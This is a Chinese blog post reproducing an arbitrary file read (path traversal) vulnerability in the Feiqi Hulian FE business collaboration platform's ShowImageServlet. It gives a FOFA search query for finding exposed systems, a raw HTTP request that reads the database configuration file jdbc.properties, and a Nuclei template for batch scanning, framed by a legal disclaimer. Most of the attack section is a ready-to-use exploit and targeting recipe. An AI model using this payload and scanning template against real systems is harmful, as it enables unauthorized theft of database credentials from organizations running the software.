漏洞复现--飞企互联FE业务协作平台ShowImageServlet任意文件读取

最新推荐文章于 2024-06-11 17:37:07 发布
最新推荐文章于 2024-06-11 17:37:07 发布
阅读量355 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134501809
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术,实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取。

二:漏洞影响版本

version <=v6.6.0

三:网络空间测绘查询

fofa:
app="飞企互联-FE企业运营管理平台"
image.png

四:漏洞复现

image.png
POC:

GET /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print HTTP/1.1
Host: x.x.x.x
Cookie: yourcookie
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image.png

五:批量检测

id: Feiqihulian-FE-ShowImageServlet-Arbitrary-file-reads
info:
  name: Feiqihulian-FE-ShowImageServlet-Arbitrary-file-reads
  author: 芝士土拨鼠
  severity: high
  description: FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术,实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取

requests:
  - raw:
      - |+
        GET /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - sql
      - type: status
        status:
          - 200

image.png

芝士土包鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞
xiaokp7的博客
09-13 716
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
【1day】复现飞企互联 FE业务协作平台 ShowImageServlet 接口任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 508
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
飞企互联-FE企业运营管理平台 druid路径 弱口令漏洞复现
0xSec
04-08 589
飞企互联-FE企业运营管理平台/druid/login.html 路径处的登录接口存在弱口令漏洞,未授权的攻击者可通过该漏洞直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。
飞企互联-FE企业运营管理平台 videotexMonitor SQL注入漏洞复现
0xSec
01-31 713
飞企互联-FE企业运营管理平台 videotexMonitor接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
飞企互联-FE企业运营管理平台 多处登录绕过漏洞复现
0xSec
12-28 1613
飞企互联-FE企业运营管理平台2.ln、loginService.fe接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。
【0day】复现飞企互联 FE业务协作平台接口任意文件读取漏洞
记录并分享学习安全的知识点..
10-16 397
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
基于ssm的面向tcp-ip与网络互联实验平台代码
04-20
面向tcp_ip与网络互联实验平台代码 java面向tcp_ip与网络互联实验平台代码 基于ssm的面向tcp_ip与网络互联实验平台代码 1、面向tcp_ip与网络互联实验平台的技术栈、环境、工具、软件: ① 系统环境:Windows/Mac ② ...
面向tcp-ip与网络互联实验平台代码 java面向tcp-ip与网络互联实验平台代码
04-20
面向tcp_ip与网络互联实验平台代码 java面向tcp_ip与网络互联实验平台代码 基于ssm的面向tcp_ip与网络互联实验平台代码 1、面向tcp_ip与网络互联实验平台的技术栈、环境、工具、软件: ① 系统环境:Windows/Mac ② ...
面向tcp-ip与网络互联实验平台-面向tcp-ip与网络互联实验平台java代码-基于ssm的面向tcp-ip与
04-20
面向tcp_ip与网络互联实验-面向tcp_ip与网络互联实验平台-面向tcp_ip与网络互联实验平台源码-面向tcp_ip与网络互联实验平台java代码-面向tcp_ip与网络互联实验平台设计与实现-基于ssm的面向tcp_ip与网络互联实验平台...
基于Web的面向tcp-ip与网络互联实验平台设计与实现-面向tcp-ip与网络互联实验平台java代码-面向tcp-ip与网络
04-20
面向tcp_ip与网络互联实验-面向tcp_ip与网络互联实验平台-面向tcp_ip与网络互联实验平台源码-面向tcp_ip与网络互联实验平台java代码-面向tcp_ip与网络互联实验平台设计与实现-基于ssm的面向tcp_ip与网络互联实验平台...
OptiXtrans DC908 -智能数据中心互联产品解读.pdf
11-13
OptiXtrans DC908 ——智能数据中心互联产品解读
飞企互联-FE企业运营管理平台管理员权限登录绕过漏洞复现
qq_39573664的博客
12-29 742
飞企互联FE企业运营管理平台存在一个潜在的安全漏洞,涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面,直接进入后台管理页面,获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会,对系统的安全性构成潜在威胁。
【渗透+取证】博客传送门(持续更新中)
记录并分享学习安全的知识点..
12-05 1653
【渗透+取证】博客传送门(持续更新中)
【1day】复现飞企互联 FE业务协作平台editflow_manager文件SQL注入漏洞
记录并分享学习安全的知识点..
12-12 644
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台editflow_manager文件存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
飞企互联FE业务协作平台 ShowImageServlet 文件读取漏洞复现
0xSec
12-21 974
飞企互联 FE 业务协作平台ShowImageServlet接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现飞企互联-FE企业运营管理平台-parsetree-sql注入
知黑而守白
02-22 248
飞企互联FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。飞企互联FE企业运营管理平台中的 parsetree 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 598
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
on-chip片上互联网络 pdf
01-11
On-chip片上互联网络是一种用于微处理器内部各个组件之间通信的互联网络结构。这种网络结构可以提供高效的数据传输和低延迟的通信,能够满足现代微处理器对快速、可靠通信的需求。此外,on-chip片上互联网络还可以实现对内存、缓存和计算单元等各种资源的统一管理和调度,有助于提高整个系统的性能和能效。 在“on-chip片上互联网络”这本PDF文档中,我们可以了解到关于该网络结构的详细介绍和原理分析。文档中可能包括对片上互联网络的设计目标、实现方式和性能评估等内容。通过学习这些内容,我们可以更深入地了解on-chip片上互联网络的工作原理和优势,有助于我们在设计和优化微处理器系统时能够更好地应用这一技术。 此外,文档中还可能包括对on-chip片上互联网络在实际应用中的案例分析和经验总结。这些案例可以帮助我们更好地理解on-chip片上互联网络在不同场景下的应用特点和优化方法,有助于我们在实际项目中做出更好的决策。 总的来说,通过学习“on-chip片上互联网络”这本PDF文档,我们可以系统地了解这一重要的微处理器内部通信技术,为我们在相关领域的工作和研究提供更多的思路和参考。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值